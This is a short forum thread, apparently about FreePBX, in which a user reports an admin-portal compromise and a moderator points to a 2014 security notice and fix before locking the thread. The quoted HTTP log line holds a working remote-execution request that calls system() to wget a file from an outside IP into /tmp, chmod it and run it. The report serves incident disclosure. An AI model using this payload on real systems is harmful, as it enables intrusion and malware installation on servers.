Admin portal hackable to download and execute files in /tmp

Found in http logs:

“GET /admin/config.php?display=A&handler=api&file=A&module=A&function=system&args=echo%20sup;wget%20http%3A%2F%2F162.213.24.40%2Fbesh%20-O%20%2Ftmp%2Ftoplel%3B%20chmod%20777%20%2Ftmp%2Ftoplel%3B%20%2Ftmp%2Ftoplel%3B HTTP/1.1” 200 345 “-” “Python-urllib/2.7”

This download a script file in /tmp/

toplel is a script that downloads another program, chmod 777 it and run!

System Hacked!

Francesco TheCalle Callegaro

Discussed at length in February. http://www.freepbx.org/news/2014-02-06/security-vulnerability-notice

Along with the fix and CVE and several announcements.

I am locking this thread because, as I said, it’s been discussed at length and is nothing new.